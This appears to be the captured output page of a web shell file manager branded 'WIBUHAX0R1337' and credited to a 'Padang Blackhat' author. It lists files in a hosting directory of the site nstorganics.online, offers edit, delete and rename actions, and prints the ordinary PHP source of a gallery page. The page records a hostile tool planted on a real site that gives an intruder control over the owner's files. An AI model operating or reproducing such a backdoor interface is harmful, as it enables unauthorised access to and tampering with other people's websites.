-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
nstorganics.online
/
partials
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
.htaccess
0.192KB
Edit File
Delete File
Rename
gallery.php
0.669KB
Edit File
Delete File
Rename
testimonials.php
1.755KB
Edit File
Delete File
Rename
<div class="card gallery w-full mt-6 lg:flex items-center justify-center flex-wrap"> <?php //List products from database $results = "SELECT * FROM tbl_gallery order by rand()"; $res = mysqli_query($conn, $results); $count = mysqli_num_rows($res); if($count>0){ while($row=mysqli_fetch_assoc($res)){ $gimage='images/gallery/'.$row["gimage"]; ?> <img src="<?php echo $gimage ?>" class="w-full h-[300px] lg:w-[300px] flex-grow-1 flex-shrink-0" alt="<?php echo $gimage ?>"> <?php } }else{ echo ' <div class="text-center bg-teal-500 my-6 p-6 text-white font-bold"> <p>No Gallery items Available</p> </div> '; } ?> </div>
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat